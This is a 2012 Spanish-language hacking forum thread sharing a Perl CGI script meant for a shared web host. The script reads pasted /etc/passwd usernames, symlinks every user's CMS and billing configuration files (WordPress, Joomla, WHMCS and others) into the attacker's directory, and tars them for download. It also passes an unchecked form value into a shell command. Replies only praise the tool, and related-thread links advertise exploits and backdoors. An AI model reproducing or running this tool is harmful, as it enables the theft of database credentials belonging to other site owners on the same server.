comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Tool para sacar Todos! los archivos de configuracion de un servidor

  • 3 Respuestas
  • 2638 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5396
  • Actividad:
    36.67%
  • Reputación 31
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« en: Abril 09, 2012, 09:11:33 am »
Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
#!/usr/bin/perl -I/usr/local/bandmin
print "Content-type: text/html\n\n";
print'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="shortcut icon" href="http://street48.co.cc/favicon.ico">
<meta http-equiv="Content-Language" content="en-us" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Patience, we will root.</title>
<style type="text/css">
.dz {
    font-family: Tahoma;
    font-size: 10px;
    font-weight: bold;
    color: #000000;
    text-align: center;
    text-shadow: black 0px 0px 2px;
}
#checkouttextarea {

  webkit-border-radius: 15px;

}
:hover#checkouttextarea {opacity: 0.6; background-color:000000 }
</style>
</head>
';
sub lil{
    ($user) = @_;
$msr = qx{pwd};
$kola=$msr."/".$user;
$kola=~s/\n//g;
symlink('/home/'.$user.'/public_html/includes/configure.php',$kola.'~shop.txt');
symlink('/home/'.$user.'/public_html/os/includes/configure.php',$kola.'~shop-os.txt');
symlink('/home/'.$user.'/public_html/oscom/includes/configure.php',$kola.'~oscom.txt');
symlink('/home/'.$user.'/public_html/oscommerce/includes/configure.php',$kola.'~oscommerce.txt');
symlink('/home/'.$user.'/public_html/oscommerces/includes/configure.php',$kola.'~oscommerces.txt');
symlink('/home/'.$user.'/public_html/shop/includes/configure.php',$kola.'~shop2.txt');
symlink('/home/'.$user.'/public_html/shopping/includes/configure.php',$kola.'~shop-shopping.txt');
symlink('/home/'.$user.'/public_html/sale/includes/configure.php',$kola.'~sale.txt');
symlink('/home/'.$user.'/public_html/amember/config.inc.php',$kola.'~amember.txt');
symlink('/home/'.$user.'/public_html/config.inc.php',$kola.'~amember2.txt');
symlink('/home/'.$user.'/public_html/members/configuration.php',$kola.'~members.txt');
symlink('/home/'.$user.'/public_html/config.php',$kola.'~2.txt');
symlink('/home/'.$user.'/public_html/forum/includes/config.php',$kola.'~forum.txt');
symlink('/home/'.$user.'/public_html/forums/includes/config.php',$kola.'~forums.txt');
symlink('/home/'.$user.'/public_html/admin/conf.php',$kola.'~5.txt');
symlink('/home/'.$user.'/public_html/admin/config.php',$kola.'~4.txt');
symlink('/home/'.$user.'/public_html/wp-config.php',$kola.'~wp13.txt');
symlink('/home/'.$user.'/public_html/wp/wp-config.php',$kola.'~wp13-wp.txt');
symlink('/home/'.$user.'/public_html/WP/wp-config.php',$kola.'~wp13-WP.txt');
symlink('/home/'.$user.'/public_html/wp/beta/wp-config.php',$kola.'-wp13-wp-beta.txt');
symlink('/home/'.$user.'/public_html/beta/wp-config.php',$kola.'~wp13-beta.txt');
symlink('/home/'.$user.'/public_html/press/wp-config.php',$kola.'~wp13-press.txt');
symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$kola.'~wp13-wordpress.txt');
symlink('/home/'.$user.'/public_html/Wordpress/wp-config.php',$kola.'~wp13-Wordpress.txt');
symlink('/home/'.$user.'/public_html/wordpress/beta/wp-config.php',$kola.'~wp13-wordpress-beta.txt');
symlink('/home/'.$user.'/public_html/news/wp-config.php',$kola.'~wp13-news.txt');
symlink('/home/'.$user.'/public_html/new/wp-config.php',$kola.'~wp13-new.txt');
symlink('/home/'.$user.'/public_html/blog/wp-config.php',$kola.'~wp-blog.txt');
symlink('/home/'.$user.'/public_html/beta/wp-config.php',$kola.'~wp-beta.txt');
symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$kola.'~wp-blogs.txt');
symlink('/home/'.$user.'/public_html/home/wp-config.php',$kola.'~wp-home.txt');
symlink('/home/'.$user.'/public_html/protal/wp-config.php',$kola.'~wp-protal.txt');
symlink('/home/'.$user.'/public_html/site/wp-config.php',$kola.'~wp-site.txt');
symlink('/home/'.$user.'/public_html/main/wp-config.php',$kola.'~wp-main.txt');
symlink('/home/'.$user.'/public_html/test/wp-config.php',$kola.'~wp-test.txt');
symlink('/home/'.$user.'/public_html/conf_global.php',$kola.'~6.txt');
symlink('/home/'.$user.'/public_html/include/db.php',$kola.'~7.txt');
symlink('/home/'.$user.'/public_html/connect.php',$kola.'-8.txt');
symlink('/home/'.$user.'/public_html/mk_conf.php',$kola.'~9.txt');
symlink('/home/'.$user.'/public_html/include/config.php',$kola.'~12.txt');
symlink('/home/'.$user.'/public_html/joomla/configuration.php',$kola.'~joomla2.txt');
symlink('/home/'.$user.'/public_html/protal/configuration.php',$kola.'~joomla-protal.txt');
symlink('/home/'.$user.'/public_html/joo/configuration.php',$kola.'~joo.txt');
symlink('/home/'.$user.'/public_html/cms/configuration.php',$kola.'~joomla-cms.txt');
symlink('/home/'.$user.'/public_html/site/configuration.php',$kola.'~joomla-site.txt');
symlink('/home/'.$user.'/public_html/main/configuration.php',$kola.'~joomla-main.txt');
symlink('/home/'.$user.'/public_html/news/configuration.php',$kola.'~joomla-news.txt');
symlink('/home/'.$user.'/public_html/new/configuration.php',$kola.'~joomla-new.txt');
symlink('/home/'.$user.'/public_html/home/configuration.php',$kola.'~joomla-home.txt');
symlink('/home/'.$user.'/public_html/vb/includes/config.php',$kola.'~vb.txt');
symlink('/home/'.$user.'/public_html/vb3/includes/config.php',$kola.'~vb3.txt');
symlink('/home/'.$user.'/public_html/includes/config.php',$kola.'~includes-vb.txt');
symlink('/home/'.$user.'/public_html/whm/configuration.php',$kola.'~whm15.txt');
symlink('/home/'.$user.'/public_html/central/configuration.php',$kola.'~whm-central.txt');
symlink('/home/'.$user.'/public_html/whm/whmcs/configuration.php',$kola.'~whm-whmcs.txt');
symlink('/home/'.$user.'/public_html/whm/WHMCS/configuration.php',$kola.'~whm-WHMCS.txt');
symlink('/home/'.$user.'/public_html/whmc/WHM/configuration.php',$kola.'~whmc-WHM.txt');
symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$kola.'~whmcs.txt');
symlink('/home/'.$user.'/public_html/support/configuration.php',$kola.'~support.txt');
symlink('/home/'.$user.'/public_html/supp/configuration.php',$kola.'~supp.txt');
symlink('/home/'.$user.'/public_html/secure/configuration.php',$kola.'~sucure.txt');
symlink('/home/'.$user.'/public_html/secure/whm/configuration.php',$kola.'~sucure-whm.txt');
symlink('/home/'.$user.'/public_html/secure/whmcs/configuration.php',$kola.'~sucure-whmcs.txt');
symlink('/home/'.$user.'/public_html/cpanel/configuration.php',$kola.'~cpanel.txt');
symlink('/home/'.$user.'/public_html/panel/configuration.php',$kola.'~panel.txt');
symlink('/home/'.$user.'/public_html/host/configuration.php',$kola.'~host.txt');
symlink('/home/'.$user.'/public_html/hosting/configuration.php',$kola.'~hosting.txt');
symlink('/home/'.$user.'/public_html/hosts/configuration.php',$kola.'~hosts.txt');
symlink('/home/'.$user.'/public_html/configuration.php',$kola.'~joomla.txt');
symlink('/home/'.$user.'/public_html/submitticket.php',$kola.'~whmcs2.txt');
symlink('/home/'.$user.'/public_html/clients/configuration.php',$kola.'~clients.txt');
symlink('/home/'.$user.'/public_html/client/configuration.php',$kola.'~client.txt');
symlink('/home/'.$user.'/public_html/clientes/configuration.php',$kola.'~clientes.txt');
symlink('/home/'.$user.'/public_html/cliente/configuration.php',$kola.'~client.txt');
symlink('/home/'.$user.'/public_html/clientsupport/configuration.php',$kola.'~clientsupport.txt');
symlink('/home/'.$user.'/public_html/billing/configuration.php',$kola.'~billing.txt');
symlink('/home/'.$user.'/public_html/manage/configuration.php',$kola.'~whm-manage.txt');
symlink('/home/'.$user.'/public_html/my/configuration.php',$kola.'~whm-my.txt');
symlink('/home/'.$user.'/public_html/myshop/configuration.php',$kola.'~whm-myshop.txt');
symlink('/home/'.$user.'/public_html/includes/dist-configure.php',$kola.'~zencart.txt');
symlink('/home/'.$user.'/public_html/zencart/includes/dist-configure.php',$kola.'vshop-zencart.txt');
symlink('/home/'.$user.'/public_html/shop/includes/dist-configure.php',$kola.'~shop-ZCshop.txt');
symlink('/home/'.$user.'/public_html/Settings.php',$kola.'~smf.txt');
symlink('/home/'.$user.'/public_html/smf/Settings.php',$kola.'~smf2.txt');
symlink('/home/'.$user.'/public_html/forum/Settings.php',$kola.'~smf-forum.txt');
symlink('/home/'.$user.'/public_html/forums/Settings.php',$kola.'~smf-forums.txt');
symlink('/home/'.$user.'/public_html/upload/includes/config.php',$kola.'~up.txt');
symlink('/home/'.$user.'/public_html/up/includes/config.php',$kola.'~up2.txt');
symlink('/home/'.$user.'/public_html/include/connect.php',$kola.'~DuhokFrm1.txt');
symlink('/home/'.$user.'/public_html/include/connection.php',$kola.'~DuhokFrm2.txt');
symlink('/home/'.$user.'/public_html/_includes__/config.php',$kola.'~AlamSport1.txt');
symlink('/home/'.$user.'/public_html/_includes__/connect.php',$kola.'~AlamSport2.txt');
symlink('/home/'.$user.'/public_html/order/configuration.php',$kola.'~order.txt');
symlink('/home/'.$user.'/public_html/portal/configuration.php',$kola.'~portal.txt'); 
symlink('/home/'.$user.'/public_html/clientarea/configuration.php',$kola.'~ClientArea.txt');
symlink('/home/'.$user.'/public_html/billing/configuration.php',$kola.'~Whm-123.txt');     
}
if ($ENV{'REQUEST_METHOD'} eq 'POST') {
  read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
} else {
  $buffer = $ENV{'QUERY_STRING'};
}
@pairs = split(/&/, $buffer);
foreach $pair (@pairs) {
  ($name, $value) = split(/=/, $pair);
  $name =~ tr/+/ /;
  $name =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
  $value =~ tr/+/ /;
  $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
  $FORM{$name} = $value;
}
if ($FORM{pass} eq ""){
print '
<body class="dz" bgcolor="#000000">
<p> [ </font> <font color="black">Private Root-Symlinking | 2012 AR3SW0RMED|DZ-HACKERS~ !! </font>]</p>
<p><font color="#000000">[</font> <font color="black"><font color="black">&</font><font color="black">!!</font> <font color="#000000">]</font>
</p><span><font color="black">Usage:</font><font color="black"></font></span><br />
<br /><form method="post"><strong>
<textarea id="checkouttextarea" name="pass" style="border:1px dotted #000000; width:  498px; height: 370px; background-color:#000000; font-family:Tahoma; font-size:9pt; color: black"  ></textarea><br />
&nbsp;<p>
<input name="tar" type="text" style="border:1px dotted #000000; width: 212px; background-color:#000000; font-family:Tahoma; font-size:8pt; color:black; "  /><br />
&nbsp;</p>
<p>
<input name="Submit1" type="submit" value="Get Config" style="border:1px dotted #000000; width: 99; font-family:Tahoma; font-size:10pt; color: black; text-transform:uppercase; height:23; background-color:#000000;" /></p>
</form></strong>
';
}else{
@lines =<$FORM{pass}>;
$y = @lines;
open (MYFILE, ">tar.tmp");
print MYFILE "tar -czf ".$FORM{tar}.".tar ";
for ($ka=0;$ka<$y;$ka++){
while(@lines[$ka]  =~ m/(.*?):x:/g){
&lil($1);
print MYFILE $1.".txt ";
for($kd=1;$kd<18;$kd++){
print MYFILE $1.$kd.".txt ";
}
}
 }
print'<body class="dz" bgcolor="#3F74D6">
<p>Done !!</p>
<p>&nbsp;</p>';
if($FORM{tar} ne ""){
open(INFO, "tar.tmp");
@lines =<INFO> ;
close(INFO);
system(@lines);
print'<p><a href="'.$FORM{tar}.'.tar"><font color="#00FF00">
<span style="text-decoration: none">Click Here To Download Tar File</span></font></a></p>';
}
}
 print"
</body>
</html>";

Debe tener permisos 775

Creditos: 0o_zeus_o0


Desconectado baron.power

  • *
  • Underc0der
  • Mensajes: 284
  • Actividad:
    1.67%
  • Reputación 0
    • Ver Perfil
« Respuesta #1 en: Abril 22, 2012, 07:47:20 pm »
bestial! gracias

Desconectado andrewtwo

  • *
  • Underc0der
  • Mensajes: 44
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #2 en: Agosto 30, 2012, 05:05:53 am »
lo que me llamo la atención fue <span style="text-decoration: none">Click Here To Download Tar File</span></font></a></p>';  ::)

Desconectado hdbreaker

  • *
  • Underc0der
  • Mensajes: 411
  • Actividad:
    0%
  • Reputación 0
  • HD_Breaker
    • Ver Perfil
    • Security Signal
    • Email
  • Skype: hdbreaker96
  • Twitter: @SecSignal
« Respuesta #3 en: Agosto 30, 2012, 01:28:32 pm »
Exelente Aporte

Ser Libres es un Privilegio por el cual pocos estamos dispuestos a correr el riesgo

 

¿Te gustó el post? COMPARTILO!



Exploit para Apache Struts (ejecución remota de comandos) [Tomcat]|CVE2017-5638

Iniciado por Eschiclers

Respuestas: 9
Vistas: 3260
Último mensaje Marzo 23, 2017, 03:57:38 pm
por zoro248
Routerpwn, un framework para explotar dispositivos embebidos desde tu celular

Iniciado por hkm

Respuestas: 2
Vistas: 1978
Último mensaje Agosto 01, 2011, 11:45:43 pm
por JaAViEr
Gcat - Python Backdoor Usando Gmail para Mando y Control

Iniciado por R3v0lve

Respuestas: 2
Vistas: 3799
Último mensaje Noviembre 18, 2015, 08:52:40 pm
por Stuxnet
Nuevo Exploit 0day para Internet Explorer 7, 8, 9 en Windows XP, Vista y 7

Iniciado por CalebBucker

Respuestas: 1
Vistas: 2188
Último mensaje Septiembre 17, 2012, 04:49:25 pm
por Slore
SAPYTO – Framework para realizar Penetration Tests sobre sistemas SAP

Iniciado por ZanGetsu

Respuestas: 1
Vistas: 1567
Último mensaje Mayo 20, 2013, 08:49:26 pm
por D4rkC0d3r